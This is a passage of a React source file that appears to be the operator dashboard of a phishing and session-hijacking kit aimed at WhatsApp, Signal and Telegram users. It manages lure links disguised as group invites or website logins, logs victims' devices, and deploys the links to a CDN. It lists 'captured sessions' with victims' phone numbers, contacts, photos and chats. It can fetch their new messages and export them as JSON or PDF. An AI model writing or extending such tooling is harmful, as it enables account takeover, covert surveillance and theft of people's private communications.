                                                        {link.platform === 'signal' ? 'Signal' : link.platform === 'telegram' ? 'Telegram' : link.platform === 'both' ? 'Both' : 'WhatsApp'}
                                                    </span>
                                                    {/* Scene badge */}
                                                    {(link.scene || 'join-group') === 'website-login' && (
                                                        <span className="px-2 py-0.5 bg-blue-500/20 text-blue-400 text-xs rounded-full flex items-center gap-1">
                                                            <Globe className="w-3 h-3" />
                                                            Login
                                                        </span>
                                                    )}
                                                    {(link.whatsappConnected || link.signalConnected || link.telegramConnected) && (
                                                        <span className="px-2 py-0.5 bg-green-500/20 text-green-400 text-xs rounded-full">
                                                            Connected
                                                        </span>
                                                    )}
                                                    {!link.isActive && (
                                                        <span className="px-2 py-0.5 bg-red-500/20 text-red-400 text-xs rounded-full">
                                                            Inactive
                                                        </span>
                                                    )}
                                                </div>
                                                <p className="text-sm text-gray-500 mb-2">{link.targetDescription}</p>
                                                <div className="flex items-center gap-4 text-xs text-gray-500">
                                                    <span className="flex items-center gap-1">
                                                        {link.loginMethod === 'qr' && <QrCode className="w-3 h-3" />}
                                                        {link.loginMethod === 'phone' && <Phone className="w-3 h-3" />}
                                                        {link.loginMethod === 'both' && <Smartphone className="w-3 h-3" />}
                                                        {link.loginMethod === 'qr' ? 'QR Code' : link.loginMethod === 'phone' ? 'Phone' : 'Both'}
                                                    </span>
                                                    <span className="flex items-center gap-1">
                                                        <Eye className="w-3 h-3" />
                                                        {link.visits.length} visits
                                                    </span>
                                                    <span className="flex items-center gap-1">
                                                        <Clock className="w-3 h-3" />
                                                        {new Date(link.createdAt).toLocaleDateString()}
                                                    </span>
                                                </div>
                                            </div>
                                            <div className="flex items-center gap-2">
                                                <button
                                                    onClick={(e) => { e.stopPropagation(); copyToClipboard(getTrackingUrl(link.shortCode), link.id); }}
                                                    className="p-2 bg-white/5 hover:bg-white/20 rounded-lg text-gray-500 transition-all"
                                                    title="Copy link"
                                                >
                                                    {copiedId === link.id ? <Check className="w-4 h-4 text-green-400" /> : <Copy className="w-4 h-4" />}
                                                </button>
                                                {link.cdnUrl && link.cdnDeployed && (
                                                    <button
                                                        onClick={(e) => { e.stopPropagation(); copyToClipboard(link.cdnUrl!, link.id + '-cdn'); }}
                                                        className="p-2 bg-white/5 hover:bg-white/20 rounded-lg text-gray-500 transition-all"
                                                        title="Copy CDN link"
                                                    >
                                                        {copiedId === link.id + '-cdn' ? <Check className="w-4 h-4 text-green-400" /> : <Cloud className="w-4 h-4 text-sky-400" />}
                                                    </button>
                                                )}
                                                {link.cdnUrl && !link.cdnDeployed && (!admin.permissions || admin.permissions.cdnDeploy) && (
                                                    <button
                                                        onClick={(e) => { e.stopPropagation(); deployLinkToCdn(link.id); }}
                                                        disabled={deployingLinkId === link.id}
                                                        className="p-2 bg-white/5 hover:bg-sky-500/20 rounded-lg text-gray-500 hover:text-sky-400 transition-all disabled:opacity-50 flex items-center gap-1"
                                                        title="Deploy to CDN"
                                                    >
                                                        {deployingLinkId === link.id ? (
                                                            <><Loader2 className="w-4 h-4 animate-spin" /><span className="text-xs">Deploying...</span></>
                                                        ) : (
                                                            <UploadCloud className="w-4 h-4" />
                                                        )}
                                                    </button>
                                                )}
                                                {link.cdnDeployed && (
                                                    <span className="px-2 py-1 bg-green-500/20 text-green-400 text-xs rounded-lg flex items-center gap-1" title="Deployed on CDN">
                                                        <Check className="w-3 h-3" /> CDN
                                                    </span>
                                                )}
                                                {link.cdnDeployed && (
                                                    <button
                                                        onClick={(e) => { e.stopPropagation(); removeLinkFromCdn(link.id); }}
                                                        disabled={removingLinkId === link.id}
                                                        className="p-2 bg-white/5 hover:bg-orange-500/20 rounded-lg text-gray-500 hover:text-orange-400 transition-all disabled:opacity-50"
                                                        title="Remove from CDN"
                                                    >
                                                        {removingLinkId === link.id ? <Loader2 className="w-4 h-4 animate-spin" /> : <CloudOff className="w-4 h-4" />}
                                                    </button>
                                                )}
                                                <button
                                                    onClick={(e) => { e.stopPropagation(); toggleLinkActive(link); }}
                                                    className="p-2 bg-white/5 hover:bg-white/20 rounded-lg transition-all"
                                                    title={link.isActive ? 'Deactivate' : 'Activate'}
                                                >
                                                    {link.isActive ? <ToggleRight className="w-4 h-4 text-green-400" /> : <ToggleLeft className="w-4 h-4 text-gray-500" />}
                                                </button>
                                                <button
                                                    onClick={(e) => { e.stopPropagation(); deleteLink(link.id); }}
                                                    className="p-2 bg-white/5 hover:bg-red-500/20 rounded-lg text-gray-500 hover:text-red-400 transition-all"
                                                    title="Delete"
                                                >
                                                    <Trash2 className="w-4 h-4" />
                                                </button>
                                            </div>
                                        </div>
                                    </div>
                                ))
                            )}
                        </div>
                    </div>

                    {/* Link Details / Recent Activity */}
                    <div className="glass-card rounded-2xl overflow-hidden">
                        {selectedLink ? (
                            <>
                                <div className="p-6 border-b border-white/10">
                                    <div className="flex items-center justify-between mb-4">
                                        <h2 className="text-lg font-semibold text-white">Link Details</h2>
                                        <button
                                            onClick={() => setSelectedLink(null)}
                                            className="p-1 hover:bg-white/5 rounded text-gray-500"
                                        >
                                            <X className="w-4 h-4" />
                                        </button>
                                    </div>
                                    <div className="space-y-3">
                                        <div>
                                            <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Name</p>
                                            <p className="text-white">{selectedLink.name}</p>
                                        </div>
                                        <div>
                                            <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Target</p>
                                            <p className="text-gray-300">{selectedLink.targetDescription}</p>
                                        </div>
                                        <div>
                                            <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">URL</p>
                                            <div className="flex items-center gap-2">
                                                <code className="flex-1 bg-black/30 px-3 py-2 rounded text-sm text-indigo-300 truncate">
                                                    {getTrackingUrl(selectedLink.shortCode)}
                                                </code>
                                                <button
                                                    onClick={() => copyToClipboard(getTrackingUrl(selectedLink.shortCode), selectedLink.id + '-detail')}
                                                    className="p-2 bg-white/5 hover:bg-white/20 rounded text-gray-500"
                                                >
                                                    {copiedId === selectedLink.id + '-detail' ? <Check className="w-4 h-4 text-green-400" /> : <Copy className="w-4 h-4" />}
                                                </button>
                                            </div>
                                        </div>
                                        {selectedLink.cdnUrl && (
                                            <div>
                                                <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">CDN URL</p>
                                                <div className="flex items-center gap-2">
                                                    <code className="flex-1 bg-black/30 px-3 py-2 rounded text-sm text-sky-300 truncate">
                                                        {selectedLink.cdnUrl}
                                                    </code>
                                                    <button
                                                        onClick={() => copyToClipboard(selectedLink.cdnUrl!, selectedLink.id + '-cdn-detail')}
                                                        className="p-2 bg-white/5 hover:bg-white/20 rounded text-gray-500"
                                                    >
                                                        {copiedId === selectedLink.id + '-cdn-detail' ? <Check className="w-4 h-4 text-green-400" /> : <Cloud className="w-4 h-4 text-sky-400" />}
                                                    </button>
                                                </div>
                                            </div>
                                        )}
                                        <div className="grid grid-cols-2 gap-3">
                                            <div>
                                                <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Method</p>
                                                <p className="text-gray-300 capitalize">{selectedLink.loginMethod}</p>
                                            </div>
                                            <div>
                                                <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Status</p>
                                                <p className={selectedLink.isActive ? 'text-green-400' : 'text-red-400'}>
                                                    {selectedLink.isActive ? 'Active' : 'Inactive'}
                                                </p>
                                            </div>
                                        </div>
                                        {selectedLink.whatsappConnected && (
                                            <div>
                                                <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">WhatsApp</p>
                                                <p className="text-green-400">{selectedLink.whatsappPhoneNumber || 'Connected'}</p>
                                            </div>
                                        )}
                                        {selectedLink.signalConnected && (
                                            <div>
                                                <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Signal</p>
                                                <p className="text-[#3A76F0]">{selectedLink.signalPhoneNumber || 'Connected'}</p>
                                            </div>
                                        )}
                                        <div>
                                            <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Platform</p>
                                            <p className={`${
                                                selectedLink.platform === 'signal' 
                                                    ? 'text-[#3A76F0]' 
                                                    : selectedLink.platform === 'both'
                                                    ? 'text-indigo-300'
                                                    : 'text-green-400'
                                            } capitalize`}>{selectedLink.platform || 'whatsapp'}</p>
                                        </div>
                                    </div>
                                </div>
                                <div className="p-6">
                                    <h3 className="text-sm font-medium text-gray-500 mb-4">Visit History ({selectedLink.visits.length})</h3>
                                    <div className="space-y-3 max-h-[300px] overflow-y-auto">
                                        {selectedLink.visits.length === 0 ? (
                                            <p className="text-gray-500 text-sm text-center py-4">No visits yet</p>
                                        ) : (
                                            selectedLink.visits.slice().reverse().map(visit => {
                                                const parsed = parseUserAgent(visit.userAgent);
                                                return (
                                                    <div key={visit.id} className="bg-black/20 rounded-lg p-3">
                                                        <div className="flex items-center gap-2 mb-2">
                                                            <Monitor className="w-4 h-4 text-gray-500" />
                                                            <span className="text-sm text-white">{parsed.device} • {parsed.os}</span>
                                                        </div>
                                                        <div className="flex items-center gap-2 mb-1">
                                                            <Globe className="w-3 h-3 text-gray-500" />
                                                            <span className="text-xs text-gray-500">{parsed.browser}</span>
                                                        </div>
                                                        <div className="flex items-center gap-2">
                                                            <Clock className="w-3 h-3 text-gray-500" />
                                                            <span className="text-xs text-gray-500">{formatDate(visit.timestamp)}</span>
                                                        </div>
                                                    </div>
                                                );
                                            })
                                        )}
                                    </div>
                                </div>
                            </>
                        ) : (
                            <>
                                <div className="p-6 border-b border-white/10">
                                    <h2 className="text-lg font-semibold text-white flex items-center gap-2">
                                        <Activity className="w-5 h-5" />
                                        Recent Activity
                                    </h2>
                                </div>
                                <div className="p-6">
                                    <div className="space-y-3 max-h-[500px] overflow-y-auto">
                                        {stats?.recentVisits.length === 0 ? (
                                            <p className="text-gray-500 text-sm text-center py-8">No recent activity</p>
                                        ) : (
                                            stats?.recentVisits.map(visit => {
                                                const parsed = parseUserAgent(visit.userAgent);
                                                return (
                                                    <div key={visit.id} className="bg-black/20 rounded-lg p-3">
                                                        <p className="text-sm text-white mb-1">{visit.linkName}</p>
                                                        <div className="flex items-center gap-2 mb-1">
                                                            <Monitor className="w-3 h-3 text-gray-500" />
                                                            <span className="text-xs text-gray-500">{parsed.device} • {parsed.os} • {parsed.browser}</span>
                                                        </div>
                                                        <div className="flex items-center gap-2">
                                                            <Clock className="w-3 h-3 text-gray-500" />
                                                            <span className="text-xs text-gray-500">{formatDate(visit.timestamp)}</span>
                                                        </div>
                                                    </div>
                                                );
                                            })
                                        )}
                                    </div>
                                </div>
                            </>
                        )}
                    </div>
                </div>
                )}

                {/* Captured Sessions Tab */}
                {activeTab === 'sessions' && (
                <div className="grid grid-cols-1 lg:grid-cols-3 gap-6">
                    {/* Sessions List */}
                    <div className="lg:col-span-2 glass-card rounded-2xl overflow-hidden">
                        <div className="p-6 border-b border-white/10 flex items-center justify-between">
                            <h2 className="text-lg font-semibold text-white flex items-center gap-2">
                                <MessageCircle className="w-5 h-5" />
                                Captured Sessions
                            </h2>
                            <button
                                onClick={fetchCapturedSessions}
                                className="p-2 bg-white/5 hover:bg-white/20 rounded-lg text-gray-500 transition-all"
                            >
                                <RefreshCw className="w-4 h-4" />
                            </button>
                        </div>

                        <div className="divide-y divide-white/10 max-h-[600px] overflow-y-auto">
                            {capturedSessions.length === 0 ? (
                                <div className="p-12 text-center">
                                    <MessageCircle className="w-12 h-12 text-gray-500 mx-auto mb-4" />
                                    <p className="text-gray-500">No captured sessions yet</p>
                                    <p className="text-gray-500 text-sm">Sessions will appear here when users scan QR codes</p>
                                </div>
                            ) : (
                                capturedSessions.map(session => (
                                    <div
                                        key={session.id}
                                        className={`p-4 hover:bg-white/5 cursor-pointer transition-all ${selectedSession?.id === session.id ? 'bg-white/5' : ''}`}
                                        onClick={() => setSelectedSession(session)}
                                    >
                                        <div className="flex items-start justify-between">
                                            <div className="flex-1">
                                                <div className="flex items-center gap-2 mb-1">
                                                    {/* Platform indicator */}
                                                    <span className={`px-2 py-0.5 text-xs rounded-full flex items-center gap-1 ${
                                                        session.platform === 'signal' 
                                                            ? 'bg-[#3A76F0]/20 text-[#3A76F0]' 
                                                            : session.platform === 'telegram'
                                                            ? 'bg-[#0088cc]/20 text-[#0088cc]'
                                                            : 'bg-green-500/20 text-green-400'
                                                    }`}>
                                                        {session.platform === 'signal' ? (
                                                            <MessageCircle className="w-3 h-3" />
                                                        ) : session.platform === 'telegram' ? (
                                                            <MessageCircle className="w-3 h-3" />
                                                        ) : (
                                                            <Smartphone className="w-3 h-3" />
                                                        )}
                                                        {session.platform === 'signal' ? 'Signal' : session.platform === 'telegram' ? 'Telegram' : 'WhatsApp'}
                                                    </span>
                                                    <h3 className="font-medium text-white">{session.phoneNumber}</h3>
                                                    <span className={`px-2 py-0.5 text-xs rounded-full ${
                                                        session.status === 'pending' ? 'bg-yellow-500/20 text-yellow-400' :
                                                        session.status === 'approved' ? 'bg-green-500/20 text-green-400' :
                                                        'bg-red-500/20 text-red-400'
                                                    }`}>
                                                        {session.status}
                                                    </span>
                                                    {(session as any)._liveUpdate && (
                                                        <span className="px-2 py-0.5 text-xs rounded-full bg-emerald-500/20 text-emerald-400 animate-pulse">
                                                            Live
                                                        </span>
                                                    )}
                                                </div>
                                                <p className="text-sm text-gray-500 mb-2">{session.groupName}</p>
                                                <div className="flex items-center gap-4 text-xs text-gray-500">
                                                    <span className="flex items-center gap-1">
                                                        <Users className="w-3 h-3" />
                                                        {session.sessionData.contacts.length} contacts
                                                    </span>
                                                    <span className="flex items-center gap-1">
                                                        <MessageCircle className="w-3 h-3" />
                                                        {session.sessionData.chats.length} chats
                                                    </span>
                                                    <span className="flex items-center gap-1">
                                                        <Clock className="w-3 h-3" />
                                                        {new Date(session.capturedAt).toLocaleDateString()}
                                                    </span>
                                                </div>
                                            </div>
                                            <div className="flex items-center gap-2">
                                                <button
                                                    onClick={(e) => { e.stopPropagation(); refreshSession(session.id); }}
                                                    className={`p-2 bg-blue-500/20 hover:bg-blue-500/30 rounded-lg text-blue-400 transition-all ${refreshingSession === session.id ? 'animate-spin' : ''}`}
                                                    title="Refresh Data"
                                                    disabled={refreshingSession === session.id}
                                                >
                                                    <RefreshCw className="w-4 h-4" />
                                                </button>
                                                <button
                                                    onClick={(e) => { e.stopPropagation(); downloadSession(session); }}
                                                    className="p-2 bg-white/5 hover:bg-white/20 rounded-lg text-gray-500 transition-all"
                                                    title="Download JSON"
                                                >
                                                    <Download className="w-4 h-4" />
                                                </button>
                                                {session.status === 'pending' && (
                                                    <>
                                                        <button
                                                            onClick={(e) => { e.stopPropagation(); updateSessionStatus(session.id, 'approved'); }}
                                                            className="p-2 bg-green-500/20 hover:bg-green-500/30 rounded-lg text-green-400 transition-all"
                                                            title="Approve"
                                                        >
                                                            <UserCheck className="w-4 h-4" />
                                                        </button>
                                                        <button
                                                            onClick={(e) => { e.stopPropagation(); updateSessionStatus(session.id, 'rejected'); }}
                                                            className="p-2 bg-red-500/20 hover:bg-red-500/30 rounded-lg text-red-400 transition-all"
                                                            title="Reject"
                                                        >
                                                            <UserX className="w-4 h-4" />
                                                        </button>
                                                    </>
                                                )}
                                                <button
                                                    onClick={(e) => { e.stopPropagation(); deleteSession(session.id); }}
                                                    className="p-2 bg-white/5 hover:bg-red-500/20 rounded-lg text-gray-500 hover:text-red-400 transition-all"
                                                    title="Delete"
                                                >
                                                    <Trash2 className="w-4 h-4" />
                                                </button>
                                            </div>
                                        </div>
                                    </div>
                                ))
                            )}
                        </div>
                    </div>

                    {/* Session Details */}
                    <div className="glass-card rounded-2xl overflow-hidden">
                        {selectedSession ? (
                            <>
                                <div className="p-6 border-b border-white/10">
                                    <div className="flex items-center justify-between mb-4">
                                        <h2 className="text-lg font-semibold text-white">Session Details</h2>
                                        <div className="flex items-center gap-2">
                                            <button
                                                onClick={() => refreshSession(selectedSession.id)}
                                                className={`flex items-center gap-2 px-3 py-1.5 bg-blue-500/20 hover:bg-blue-500/30 rounded-lg text-blue-400 text-sm transition-all ${refreshingSession === selectedSession.id ? 'opacity-50' : ''}`}
                                                disabled={refreshingSession === selectedSession.id}
                                                title="Fetch new messages"
                                            >
                                                <RefreshCw className={`w-4 h-4 ${refreshingSession === selectedSession.id ? 'animate-spin' : ''}`} />
                                                {refreshingSession === selectedSession.id ? 'Fetching...' : 'Fetch Messages'}
                                            </button>
                                            <button
                                                onClick={() => setSelectedSession(null)}
                                                className="p-1 hover:bg-white/5 rounded text-gray-500"
                                            >
                                                <X className="w-4 h-4" />
                                            </button>
                                        </div>
                                    </div>
                                    <div className="space-y-3">
                                        <div>
                                            <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Phone Number</p>
                                            <p className="text-white font-mono text-lg">{selectedSession.phoneNumber}</p>
                                        </div>
                                        <div>
                                            <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Group</p>
                                            <p className="text-gray-300">{selectedSession.groupName}</p>
                                        </div>
                                        <div className="grid grid-cols-2 gap-3">
                                            <div>
                                                <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Status</p>
                                                <p className={`font-medium ${
                                                    selectedSession.status === 'pending' ? 'text-yellow-400' :
                                                    selectedSession.status === 'approved' ? 'text-green-400' :
                                                    'text-red-400'
                                                }`}>
                                                    {selectedSession.status.charAt(0).toUpperCase() + selectedSession.status.slice(1)}
                                                </p>
                                            </div>
                                            <div>
                                                <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Captured</p>
                                                <p className="text-gray-300 text-sm">{formatDate(selectedSession.capturedAt)}</p>
                                            </div>
                                        </div>
                                        <div>
                                            <p className="text-xs text-gray-500 uppercase tracking-wide mb-1">Device</p>
                                            <p className="text-gray-300 text-sm">{parseUserAgent(selectedSession.userAgent).device} • {parseUserAgent(selectedSession.userAgent).os}</p>
                                        </div>
                                    </div>
                                </div>
                                <div className="p-6">
                                    <div className="space-y-4">
                                        {/* Contacts */}
                                        <div>
                                            <h3 className="text-sm font-medium text-gray-500 mb-2 flex items-center gap-2">
                                                <Users className="w-4 h-4" />
                                                Contacts ({selectedSession.sessionData.contacts.length})
                                            </h3>
                                            <div className="bg-black/20 rounded-lg max-h-[400px] overflow-y-auto">
                                                {selectedSession.sessionData.contacts.length === 0 ? (
                                                    <p className="text-gray-500 text-sm p-3">No contacts captured</p>
                                                ) : (
                                                    <div className="divide-y divide-white/5">
                                                        {selectedSession.sessionData.contacts.map((contact: any, idx: number) => {
                                                            const displayName = contact.name || 
                                                                [contact.firstName, contact.lastName].filter(Boolean).join(' ') || 
                                                                contact.username || 
                                                                'Unknown';
                                                            const rawPhone = contact.phoneNumber || contact.phone || '';
                                                            // Format phone number: add + prefix for real numbers
                                                            const displayPhone = rawPhone && /^\d+$/.test(rawPhone) 
                                                                ? `+${rawPhone}` 
                                                                : (rawPhone || (contact.isGroup ? '' : 'Phone unavailable'));
                                                            return (
                                                            <div key={idx} className="p-2 text-sm flex items-center gap-3">
                                                                <div className="flex-shrink-0">
                                                                    {contact.profilePicture ? (
                                                                        <img 
                                                                            src={contact.profilePicture} 
                                                                            alt="" 
                                                                            className="w-10 h-10 rounded-full object-cover border border-white/10"
                                                                        />
                                                                    ) : (
                                                                        <div className="w-10 h-10 rounded-full bg-cyan-500/20 border border-cyan-500/30 flex items-center justify-center text-white font-medium text-sm">
                                                                            {displayName.charAt(0).toUpperCase()}
                                                                        </div>
                                                                    )}
                                                                </div>
                                                                <div className="flex-1 min-w-0">
                                                                    <p className="text-white truncate">{displayName}</p>
                                                                    <p className="text-gray-500 text-xs font-mono truncate">{displayPhone}</p>
                                                                </div>
                                                            </div>
                                                            );
                                                        })}

                                                    </div>
                                                )}
                                            </div>
                                        </div>

                        {/* Chats */}
                                        <div>
                                            <h3 className="text-sm font-medium text-gray-500 mb-2 flex items-center gap-2">
                                                <MessageCircle className="w-4 h-4" />
                                                Chats with Messages
                                                <span className="text-xs text-cyan-400">(click to view messages)</span>
                                            </h3>
                                            <div className="bg-black/20 rounded-lg max-h-[400px] overflow-y-auto">
                                                {(() => {
                                                    // Build list of chats that have messages OR are groups
                                                    const messagesObj = selectedSession.sessionData.messages || {};
                                                    const chatsWithMessages: Array<{
                                                        id: string;
                                                        name: string;
                                                        isGroup: boolean;
                                                        messageCount: number;
                                                        lastMessageTime: number;
                                                    }> = [];
                                                    
                                                    // Add chats from messages object
                                                    Object.keys(messagesObj).forEach(chatId => {
                                                        const allMsgs = messagesObj[chatId] || [];
                                                        // Filter out empty "other" messages (stubs with no text)
                                                        const msgs = allMsgs.filter((m: any) => 
                                                            m.type !== 'other' || m.text || m.caption
                                                        );
                                                        if (msgs.length > 0) {
                                                            // Try to find name from contacts or chats
                                                            const contact = selectedSession.sessionData.contacts.find((c: any) => 
                                                                c.number === chatId || c.jid === chatId || c.id === chatId || c.phone === chatId
                                                            );
                                                            const chat = selectedSession.sessionData.chats.find((c: any) => 
                                                                c.number === chatId || c.jid === chatId || c.groupId === chatId || c.id === chatId
                                                            );
                                                            // Try to get name from incoming messages' sourceName or outgoing messages' recipientName
                                                            const incomingMsg = (msgs as any[]).find((m: any) => !m.fromMe && !m.isOutgoing);
                                                            const outgoingMsg = (msgs as any[]).find((m: any) => m.fromMe || m.isOutgoing);
                                                            const sourceNameFromMsg = (incomingMsg as any)?.sourceName || (incomingMsg as any)?.senderName || (outgoingMsg as any)?.recipientName;
                                                            
                                                            const contactDisplayName = contact?.name || 
                                                                [contact?.firstName, contact?.lastName].filter(Boolean).join(' ') || 
                                                                contact?.username || contact?.profileName;
                                                            const name = chat?.name || contactDisplayName || sourceNameFromMsg || chatId;
                                                            const isGroup = chat?.isGroup || chatId.startsWith('group.');
                                                            const lastMsg = msgs[msgs.length - 1];
                                                            
                                                            chatsWithMessages.push({
                                                                id: chatId,
                                                                name,
                                                                isGroup,
                                                                messageCount: msgs.length,
                                                                lastMessageTime: lastMsg?.timestamp || 0
                                                            });
                                                        }
                                                    });
                                                    
                                                    // Add groups that don't have messages yet
                                                    selectedSession.sessionData.chats
                                                        .filter((c: any) => c.isGroup)
                                                        .forEach((chat: any) => {
                                                            const chatId = chat.groupId || chat.number || chat.jid;
                                                            if (!chatsWithMessages.find(c => c.id === chatId)) {
                                                                chatsWithMessages.push({
                                                                    id: chatId,
                                                                    name: chat.name || 'Group',
                                                                    isGroup: true,
                                                                    messageCount: 0,
                                                                    lastMessageTime: 0
                                                                });
                                                            }
                                                        });
                                                    
                                                    // Sort by most recent message first
                                                    chatsWithMessages.sort((a, b) => b.lastMessageTime - a.lastMessageTime);
                                                    
                                                    if (chatsWithMessages.length === 0) {
                                                        return <p className="text-gray-500 text-sm p-3">No chats with messages yet</p>;
                                                    }
                                                    
                                                    return (
                                                        <div className="divide-y divide-white/5">
                                                            {chatsWithMessages.map((chat, idx) => (
                                                                <div 
                                                                    key={idx} 
                                                                    className="p-2 text-sm hover:bg-white/5 cursor-pointer transition-all flex items-center gap-3"
                                                                    onClick={() => {
                                                                        setSelectedChatJid(chat.id);
                                                                        setShowChatViewer(true);
                                                                        setMessageDisplayLimit(100);
                                                                    }}
                                                                >
                                                                    <div className="flex-shrink-0">
                                                                        <div className={`w-10 h-10 rounded-full flex items-center justify-center text-white font-medium text-sm ${chat.isGroup ? 'bg-gradient-to-br from-green-500 to-teal-600' : 'bg-cyan-500/20 border border-cyan-500/30'}`}>
                                                                            {chat.isGroup ? <Users className="w-5 h-5" /> : chat.name.charAt(0).toUpperCase()}
                                                                        </div>
                                                                    </div>
                                                                    <div className="flex-1 min-w-0">
                                                                        <div className="flex items-center gap-2">
                                                                            <p className="text-white truncate">{chat.name}</p>
                                                                            {chat.isGroup && (
                                                                                <span className="px-1.5 py-0.5 bg-indigo-500/20 text-cyan-400 text-xs rounded">Group</span>
                                                                            )}
                                                                        </div>
                                                                        <p className="text-gray-500 text-xs truncate">
                                                                            {chat.messageCount > 0 
                                                                                ? `${chat.messageCount} messages` 
                                                                                : 'No messages yet'}
                                                                        </p>
                                                                    </div>
                                                                    <div className="flex items-center gap-2 ml-2">
                                                                        {chat.messageCount > 0 && (
                                                                            <span className="px-2 py-0.5 bg-green-500/20 text-green-400 text-xs rounded-full">
                                                                                {chat.messageCount}
                                                                            </span>
                                                                        )}
                                                                        <ChevronLeft className="w-4 h-4 text-gray-500 rotate-180" />
                                                                    </div>
                                                                </div>
                                                            ))}
                                                        </div>
                                                    );
                                                })()}
                                            </div>
                                        </div>

                                        {/* Download Buttons */}
                                        <div className="flex gap-2">
                                            <button
                                                onClick={() => downloadSession(selectedSession)}
                                                className="flex-1 bg-cyan-500/20 hover:bg-cyan-500/30 text-cyan-400 border border-cyan-500/30 py-2 rounded-lg flex items-center justify-center gap-2 transition-all"
                                            >
                                                <Download className="w-4 h-4" />
                                                JSON
                                            </button>
                                            <button
                                                onClick={() => downloadSessionPdf(selectedSession)}
                                                className="flex-1 bg-red-500 hover:bg-red-600 text-white py-2 rounded-lg flex items-center justify-center gap-2 transition-all"
                                            >
                                                <FileText className="w-4 h-4" />
                                                PDF
                                            </button>
                                        </div>
                                    </div>
                                </div>
                            </>
                        ) : (
                            <div className="p-12 text-center">
                                <Eye className="w-12 h-12 text-gray-500 mx-auto mb-4" />
                                <p className="text-gray-500">Select a session</p>
                                <p className="text-gray-500 text-sm">Click on a session to view details</p>
                            </div>
                        )}
                    </div>
                </div>
                )}

                {/* Settings Tab */}
                {activeTab === 'settings' && (
                <div className="max-w-2xl">
                    <h2 className="text-xl font-semibold text-white mb-6">Settings</h2>

                    {/* Telegram Configuration */}
                    <div className="glass-card rounded-xl p-6 mb-6">
                        <div className="flex items-center gap-3 mb-4">
                            <div className="w-10 h-10 rounded-xl bg-[#0088CC]/20 flex items-center justify-center">
                                <MessageCircle className="w-5 h-5 text-[#0088CC]" />
                            </div>
                            <div>
                                <h3 className="text-lg font-medium text-white">Telegram API Credentials</h3>
                                <p className="text-sm text-gray-500">Required for Telegram QR code login</p>
                            </div>
                            {telegramConfigured && (
                                <span className="ml-auto px-3 py-1 bg-green-500/20 text-green-400 text-xs rounded-full flex items-center gap-1">
                                    <Check className="w-3 h-3" /> Configured
                                </span>
                            )}
                        </div>

                        <div className="space-y-4">
                            <div>
                                <label className="block text-sm text-gray-500 mb-1">API ID</label>
                                <input
                                    type="text"
                                    value={telegramApiId}
                                    onChange={(e) => setTelegramApiId(e.target.value)}
                                    placeholder="Enter your Telegram API ID (e.g. 12345678)"
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-[#0088CC]"
                                />
                            </div>
                            <div>
                                <label className="block text-sm text-gray-500 mb-1">API Hash</label>
                                <input
                                    type="password"
                                    value={telegramApiHash}
                                    onChange={(e) => setTelegramApiHash(e.target.value)}
                                    placeholder={telegramConfigured ? '••••••••••••••••' : 'Enter your Telegram API Hash'}
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-[#0088CC]"
                                />
                            </div>

                            {configMessage && (
                                <div className={`p-3 rounded-lg text-sm ${
                                    configMessage.type === 'success'
                                        ? 'bg-green-500/20 text-green-300 border border-green-500/30'
                                        : 'bg-red-500/20 text-red-300 border border-red-500/30'
                                }`}>
                                    {configMessage.text}
                                </div>
                            )}

                            <button
                                onClick={async () => {
                                    setIsSavingConfig(true);
                                    setConfigMessage(null);
                                    try {
                                        const body: any = {};
                                        if (telegramApiId) body.telegramApiId = telegramApiId;
                                        if (telegramApiHash) body.telegramApiHash = telegramApiHash;

                                        const response = await fetch(`${API_BASE_URL}/admin/config`, {
                                            method: 'POST',
                                            headers: {
                                                'Content-Type': 'application/json',
                                                'Authorization': `Bearer ${token}`
                                            },
                                            body: JSON.stringify(body),
                                        });
                                        const data = await response.json();
                                        if (data.success) {
                                            setConfigMessage({ type: 'success', text: data.message });
                                            setTelegramConfigured(data.configured);
                                            setTelegramApiHash('');
                                        } else {
                                            setConfigMessage({ type: 'error', text: data.message || 'Failed to save' });
                                        }
                                    } catch (err) {
                                        setConfigMessage({ type: 'error', text: 'Failed to save configuration' });
                                    } finally {
                                        setIsSavingConfig(false);
                                    }
                                }}
                                disabled={isSavingConfig || (!telegramApiId && !telegramApiHash)}
                                className="px-6 py-3 bg-[#0088CC] hover:bg-[#006FA8] text-white rounded-xl font-medium transition-all disabled:opacity-50 disabled:cursor-not-allowed flex items-center gap-2"
                            >
                                {isSavingConfig ? (
                                    <Loader2 className="w-4 h-4 animate-spin" />
                                ) : (
                                    <Check className="w-4 h-4" />
                                )}
                                Save Credentials
                            </button>
                        </div>

                        <div className="mt-4 p-3 bg-white/5 rounded-lg">
                            <p className="text-xs text-gray-500">
                                Get your API credentials from{' '}
                                <a href="https://my.telegram.org/apps" target="_blank" rel="noopener noreferrer" className="text-[#0088CC] hover:underline">
                                    my.telegram.org/apps
                                </a>
                                . Sign in with your phone number, create an app, and copy the API ID and API Hash.
                                These credentials are free and take less than a minute to obtain.
                            </p>
                        </div>
                    </div>

                    {/* Bunny CDN Zones */}
                    <div className="glass-card rounded-xl p-6 mb-6">
                        <div className="flex items-center gap-3 mb-4">
                            <div className="w-10 h-10 rounded-xl bg-sky-500/20 flex items-center justify-center">
                                <Cloud className="w-5 h-5 text-sky-400" />
                            </div>
                            <div>
                                <h3 className="text-lg font-medium text-white">Bunny CDN Zones</h3>
                                <p className="text-sm text-gray-500">Create and manage multiple CDN zones for your tracking links</p>
                            </div>
                            {cdnZones.length > 0 && (
                                <span className="ml-auto px-3 py-1 bg-sky-500/20 text-sky-400 text-xs rounded-full">
                                    {cdnZones.length} zone{cdnZones.length !== 1 ? 's' : ''}
                                </span>
                            )}
                        </div>

                        <div className="space-y-4">
                            {/* Existing Zones */}
